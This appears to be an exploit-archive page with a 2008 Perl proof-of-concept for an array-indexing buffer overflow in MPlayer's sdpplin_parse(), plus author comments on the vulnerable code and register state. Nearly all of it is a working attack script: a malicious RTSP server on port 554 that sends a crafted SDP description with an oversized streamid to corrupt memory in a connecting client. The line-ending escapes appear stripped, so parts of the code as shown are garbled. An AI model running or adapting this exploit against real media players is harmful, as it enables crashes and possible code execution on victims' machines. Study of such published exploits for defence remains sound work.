MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC
# Published : 2008-03-25
# Author : Guido Landi
# Previous Title : PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit
# Next Title : snircd <= 1.3.4 (send_user_mode) Denial of Service Vulnerability

#!/usr/bin/perl

# Huston, mplayer got some vulns!  :( 
# CVE-2008-0073 also apply to mplayer and vlc with some distinctions.
#
# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box.
#
# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite 
# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and 
# some before it.
#
# Vulnerable code:
# sdpplin_parse_stream()
#  desc->stream_id=atoi(buf); 
# spplin_parse()
#  desc->stream[stream->stream_id]=stream; 
#
# Test:
# - mplayer rtsp://evilhost/evil.rm 
# eax    0xa0737008  // pointer to desc->stream 
# edx    0x0495badd  // "streamid" value
# edi    0x089b59e8  // pointer to stream 
#
# <sdpplin_parse+731>: mov    DWORD PTR [eax+edx*4],edi 

use warnings;
use strict;
use IO::Socket;

my $evil_num	=  "127467297"; # this is a 4byte offset from desc->stream
		 

my $rtp_hello = "RTSP/1.0 200 OKrn".
		"CSeq: 1rn".
		"Date: Thu, 20 Mar 2008 20:07:39 GMTrn".
		"Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)rn".
		"Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWNrn".
		"RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71crn".
		"StatsMask: 3rnrn";

my $rtp_evil =	"RTSP/1.0 200 OKrn".
		"CSeq: 2rn".
		"Date: Thu, 20 Mar 2008 20:08:34 GMTrn".
		"vsrc: http://0.00.00.00:31337rn".
		"Content-base: rtsp://0.00.00.00:554/bu.rmrn".
		"ETag: 55370-2rn".
		"Session: 93033-2rn".
		"Content-type: application/sdprn".
		"Content-length: 677rnrn".

		"v=0rn".
		"o=-1028652722 1028652722 IN IP4 0.00.00.00rn".
		"s=realmp3rn".
		"i=<No author> <No copyright>rn".
		"c=IN IP4 0.0.0.0rn".
		"t=0 0rn".
		"a=SdpplinVersion:1610645242rn".
		"a=StreamCount:integer;"1166000000"rn".
		"a=Title:buffer;"dtFabH2rNoP="rn".
		"a=range:npt=0-39.471000rn".
		"m=audio 0 RTP/AVP 101rn". 	# this is referenced by "stream" 
		"b=AS:128rn".
		"a=control:streamid=$evil_numrn".
		"a=range:npt=0-39.471000rn".
		"a=length:npt=39.471000rn".
		"a=rtpmap:101 X-MP3-draft-00/1000rn".
		"a=mimetype:string;"audio/X-MP3-draft-00"rn".
		"a=StartTime:integer;0rn".
		"a=AvgBitRate:integer;128000rn".
		"a=SampleRate:integer;44100rn".
		"a=AvgPacketSize:integer;417rn".
		"a=Preroll:integer;1000rn".
		"a=NumChannels:integer;2rn".
		"a=MaxPacketSize:integer;1024rn".
		"a=ASMRuleBook:string;"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;"rn";


	
my @resps = (	$rtp_hello,	
		$rtp_evil,
	
		"RTSP/1.0 200 OKrn".
		"CSeq: 3rn".
		"Date: Sat, 22 Mar 2008 20:45:47 GMTrn".
		"Session: 93033-2nr".
		"Reconnect: truenr".
		"RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3bnr".
		"RDTFeatureLevel: 2rn".
		"Transport: x-pn-tng/tcp;interleaved=0rnrn",

		"RTSP/1.0 200 OKrn".
		"CSeq: 4rn".
		"Date: Sat, 22 Mar 2008 15:11:06 GMTrn".
		"Session: 93033-2rnrn",

		"RTSP/1.0 200 OKrn".
		"CSeq: 5rn".
		"Date: Sat, 22 Mar 2008 15:11:06 GMT".
		"RTP-Info: url=rtsp://0.00.00.00/bu.rmrnrn",
		);


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1);

while(my $csock = $sock->accept)
{
	foreach my $resp(@resps)
	{
		my $buf = read_from_sock($csock);
		print $csock $resp;
	}
}


sub read_from_sock()
{
	my ($sock) = @_;

	my $buffer = "";

	while(<$sock>)
	{
		return $buffer if /^rn$/;
		$buffer .= $_;
	}

	return $buffer;

}

# www.Syue.com [2008-03-25]